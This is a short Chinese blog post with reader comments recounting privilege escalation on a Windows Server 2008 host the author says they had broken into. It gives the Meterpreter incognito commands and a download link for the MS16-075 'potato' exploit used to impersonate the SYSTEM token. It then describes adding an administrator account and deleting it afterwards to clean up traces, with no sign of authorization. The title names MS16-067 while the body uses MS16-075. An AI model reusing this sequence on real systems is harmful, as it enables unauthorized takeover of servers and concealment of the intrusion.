DYBOY's Blog

[MS16-067]提权小记

拿到了一个08 Server 的网站,同时 3389 端口打开着,可以直接连接

尝试了 Meterpreter 反弹 shellgetsystem 但是失败了

然后团队成员Si告知下尝试了 MS16-075 的利用,记录一下

shell 中上传 potato.exe

Githubhttps://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

potato.exe : https://www.lanzous.com/i1lb0ad

在得到的反弹 shell 中,依次运行如下命令

use incognito

list_tokens -u       //列出tokens

execute -cH -f ./potato.exe        //执行exp

list_tokens -u

impersonate_token "NT AUTHORITY\\SYSTEM"    //提权

ms16-067提权

最后进入 cmd shell 中,添加管理员账号

最终效果:

效果

最后帮忙擦屁股,删账号走人~

关于MSF反弹shell:https://blog.dyboy.cn/websecurity/25.html

版权声明:《 [MS16-067]提权小记 》为DYBOY原创文章未经允许不得转载。

 DYBOY
 作者签名:安全从业者,爱好安全产品开发,渗透测试,Web漏洞研究

发表评论:

用心评论~

帅人已评:

广安网站建设
2018-08-14 08:39
谢谢博主的分享
江湖悠悠
2018-08-05 09:50
没事做
家驹
2018-08-12 01:07
@江湖悠悠:这是个大佬(ಡωಡ)
F.B.I.
2018-08-04 23:28
大佬,学习了
TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap